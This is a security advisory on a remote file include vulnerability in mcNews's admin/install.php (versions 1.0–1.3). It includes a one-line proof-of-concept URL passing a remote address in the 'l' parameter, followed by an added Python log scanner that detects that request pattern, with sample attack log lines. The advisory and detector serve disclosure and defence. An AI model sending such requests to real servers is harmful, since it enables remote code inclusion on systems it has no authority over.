McNews Install.PHP Arbitrary File Include Vulnerability
BID:12835
Info
| Bugtraq ID: | 12835 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2005 12:00AM |
| Updated: | Mar 17 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Jonathan Whiteley <[email protected]>. |
| Vulnerable: | McNews McNews 1.3; McNews McNews 1.2; McNews McNews 1.1 a; McNews McNews 1.1; McNews McNews 1.0 |
| Not Vulnerable: | |
Discussion
mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.
This issue is reported to affect mcNews versions 1.3 and prior.
Exploit / POC
No exploit is required.
The following proof of concept is available:
http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
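With no vendor patch listed, web server logs can be checked for the request shape given in the proof of concept: a request to 'install.php' whose 'l' parameter names a remote location. The Python below is an added example, not part of the original advisory or of mcNews. The log lines, client addresses and the benign value `en` are constructed, and matching protocol-relative and repeatedly percent-encoded values goes beyond the single `http://` case shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client address, request target and status from a Common/Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that names a remote resource: scheme://... or protocol-relative //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252F) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_include(line, script="install.php", param="l"):
    """Return (client_ip, status, decoded_value) when the line is a request to
    `script` whose `param` points at a remote location, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not fully_unquote(parts.path).lower().endswith("/" + script):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        value = fully_unquote(raw)
        if REMOTE_RE.match(value):
            return m.group("ip"), int(m.group("status")), value
    return None

def scan(lines):
    """Collect every suspicious request found in an iterable of log lines."""
    return [hit for hit in map(suspicious_include, lines) if hit]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2005:10:00:00 +0000] "GET /mcnews/admin/install.php?l=http://www.example.com HTTP/1.0" 200 512',
    '198.51.100.4 - - [17/Mar/2005:10:01:00 +0000] "GET /mcnews/admin/install.php?l=en HTTP/1.0" 200 2048',
    '203.0.113.9 - - [17/Mar/2005:10:02:00 +0000] "GET /mcnews/admin/install.php?l=HTTP%253A%252F%252Fwww.example.com%252Fx HTTP/1.0" 404 310',
    '198.51.100.4 - - [17/Mar/2005:10:03:00 +0000] "GET /mcnews/index.php?l=http://www.example.com HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} l={value}")
```

A hit with a 200 status means the installer script was reachable and answered the request, so that host should be reviewed first.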